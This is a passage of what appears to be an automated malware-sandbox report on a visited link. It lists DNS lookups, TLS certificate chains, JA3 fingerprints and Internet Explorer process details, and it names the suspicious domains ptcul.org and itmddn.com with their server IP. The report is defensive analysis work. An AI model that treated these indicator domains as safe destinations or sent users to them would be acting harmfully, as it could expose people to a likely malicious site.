                              Jun 11, 2021 16:52:06.528202057 CEST53637328.8.8.8192.168.2.5
                              Jun 11, 2021 16:52:07.441893101 CEST5734453192.168.2.58.8.8.8
                              Jun 11, 2021 16:52:07.494075060 CEST53573448.8.8.8192.168.2.5

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Jun 11, 2021 16:51:34.083847046 CEST192.168.2.58.8.8.80xde71Standard query (0)linkprotect.cudasvc.comA (IP address)IN (0x0001)
                              Jun 11, 2021 16:51:37.282701015 CEST192.168.2.58.8.8.80xdc69Standard query (0)www.ptcul.orgA (IP address)IN (0x0001)
                              Jun 11, 2021 16:51:50.833415985 CEST192.168.2.58.8.8.80xb489Standard query (0)www.ptcul.orgA (IP address)IN (0x0001)
                              Jun 11, 2021 16:51:52.239279032 CEST192.168.2.58.8.8.80x99fbStandard query (0)itmddn.comA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Jun 11, 2021 16:51:34.144783974 CEST8.8.8.8192.168.2.50xde71No error (0)linkprotect.cudasvc.com52.58.148.216A (IP address)IN (0x0001)
                              Jun 11, 2021 16:51:34.144783974 CEST8.8.8.8192.168.2.50xde71No error (0)linkprotect.cudasvc.com18.196.143.243A (IP address)IN (0x0001)
                              Jun 11, 2021 16:51:37.704366922 CEST8.8.8.8192.168.2.50xdc69No error (0)www.ptcul.orgptcul.orgCNAME (Canonical name)IN (0x0001)
                              Jun 11, 2021 16:51:37.704366922 CEST8.8.8.8192.168.2.50xdc69No error (0)ptcul.org103.205.64.138A (IP address)IN (0x0001)
                              Jun 11, 2021 16:51:50.893156052 CEST8.8.8.8192.168.2.50xb489No error (0)www.ptcul.orgptcul.orgCNAME (Canonical name)IN (0x0001)
                              Jun 11, 2021 16:51:50.893156052 CEST8.8.8.8192.168.2.50xb489No error (0)ptcul.org103.205.64.138A (IP address)IN (0x0001)
                              Jun 11, 2021 16:51:52.664410114 CEST8.8.8.8192.168.2.50x99fbNo error (0)itmddn.com103.205.64.138A (IP address)IN (0x0001)

                              HTTPS Packets

                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                              Jun 11, 2021 16:51:34.288378954 CEST52.58.148.216443192.168.2.549720CN=*.linkprotect.cudasvc.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USFri May 21 02:00:00 CEST 2021 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Mon Jun 20 01:59:59 CEST 2022 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                              Jun 11, 2021 16:51:34.290035963 CEST52.58.148.216443192.168.2.549719CN=*.linkprotect.cudasvc.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USFri May 21 02:00:00 CEST 2021 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Mon Jun 20 01:59:59 CEST 2022 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                              Jun 11, 2021 16:51:38.058335066 CEST103.205.64.138443192.168.2.549722CN=ptcul.org CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Jun 04 02:00:00 CEST 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Fri Sep 03 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                              CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                              CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                              Jun 11, 2021 16:51:38.068612099 CEST103.205.64.138443192.168.2.549721CN=ptcul.org CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Jun 04 02:00:00 CEST 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Fri Sep 03 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                              CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                              CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                              Jun 11, 2021 16:51:51.255502939 CEST103.205.64.138443192.168.2.549728CN=ptcul.org CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Jun 04 02:00:00 CEST 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Fri Sep 03 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                              CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                              CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                              Jun 11, 2021 16:51:53.037553072 CEST103.205.64.138443192.168.2.549730CN=itmddn.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USFri Jan 22 20:48:30 CET 2021 Tue May 03 09:00:00 CEST 2011Sat Jan 22 20:48:30 CET 2022 Sat May 03 09:00:00 CEST 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                              CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                              Jun 11, 2021 16:51:53.038113117 CEST103.205.64.138443192.168.2.549729CN=itmddn.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USFri Jan 22 20:48:30 CET 2021 Tue May 03 09:00:00 CEST 2011Sat Jan 22 20:48:30 CET 2022 Sat May 03 09:00:00 CEST 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                              CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031

                              Code Manipulations

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Start time:16:51:32
                              Start date:11/06/2021
                              Path:C:\Program Files\internet explorer\iexplore.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                              Imagebase:0x7ff73d1c0000
                              File size:823560 bytes
                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              General

                              Start time:16:51:33
                              Start date:11/06/2021
                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5784 CREDAT:17410 /prefetch:2
                              Imagebase:0xc20000
                              File size:822536 bytes
                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Disassembly

                              Reset < >